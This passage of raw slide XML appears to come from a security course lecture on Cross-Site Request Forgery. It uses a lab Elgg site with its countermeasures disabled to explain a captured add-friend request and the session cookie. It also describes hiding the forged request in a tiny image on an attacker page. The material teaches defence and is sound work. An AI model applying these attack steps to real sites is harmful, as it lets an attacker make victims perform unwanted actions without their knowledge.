                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>[?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>][#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>fragment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mostly HTTP and HTTPs are used for web applications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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 sz="2400"/>
              <a:t>Cross-Site Request Forgery Attack</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3821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1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Environment Setup:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target website</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim user who has an active session on the target website</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious website controlled </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr u="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps:</a:t>
            </a:r>
            <a:endParaRPr u="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker crafts a webpage that can forge a cross-site request to be sent to the targeted website.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker needs to attract the victim user to visit the malicious website.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The victim is logged into the targeted website.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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 sz="2400"/>
              <a:t>Environment Setup</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="17388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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elgg: open-source web application for social networking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Countermeasures for CSRF is disabled by us in the VM</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target website: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.csrflabelgg.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker’s website: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.csrflabattacker.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These websites are hosted on localhost via Apache’s Virtual Hosting (/etc/apache2/sites-enabled/000-default.conf)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="366" name="Google Shape;366;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013261" y="2809728"/>
            <a:ext cx="7185340" cy="1971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 sz="2400"/>
              <a:t>HTTP Services</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452421" y="1286862"/>
            <a:ext cx="8520600" cy="386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Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP GET requests: data (foo and bar) are attached in the URL.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="373" name="Google Shape;373;p68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="635431" y="1805647"/>
            <a:ext cx="7873138" cy="686707"/>
            <a:chOff x="525138" y="2128575"/>
            <a:chExt cx="7873138" cy="686707"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="374" name="Google Shape;374;p68"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="525138" y="2128575"/>
              <a:ext cx="7873126" cy="199625"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="375" name="Google Shape;375;p68"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="525150" y="2328200"/>
              <a:ext cx="7873126" cy="487082"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452421" y="2625039"/>
            <a:ext cx="8520600" cy="665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Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP POST requests: data (foo and bar) are placed inside the data field of the HTTP request.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="377" name="Google Shape;377;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="635432" y="3444431"/>
            <a:ext cx="7873125" cy="1108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2400"/>
              <a:t>Captured HTTP Header For the AddFriend Action</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="383" name="Google Shape;383;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="6280374" cy="1649725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="384" name="Google Shape;384;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2819850"/>
            <a:ext cx="6280365" cy="736625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6541325" y="1017725"/>
            <a:ext cx="2415600" cy="363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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> URL of Elgg’s add-friend request. UserID of the user to be added to the friend list is used. Here, Samy’s UserID (GUID) is 42.</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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Elgg’s countermeasure against CSRF attacks which are disabled.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152332" y="3845505"/>
            <a:ext cx="6280500" cy="81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sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Session cookie which is unique for each user. It is automatically sent by browsers.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Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create the malicious web page</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="392" name="Google Shape;392;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311699" y="1297019"/>
            <a:ext cx="6205337" cy="1508174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Google Shape;393;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311699" y="2920919"/>
            <a:ext cx="5927700" cy="20889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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The attacker use add-friend URL along with friend    parameter. The size of the image is very small so that the victim is not suspicious.</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3.  The crafted web page is placed in the malicious website </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.csrflabattacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/var/www/CSRF/Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
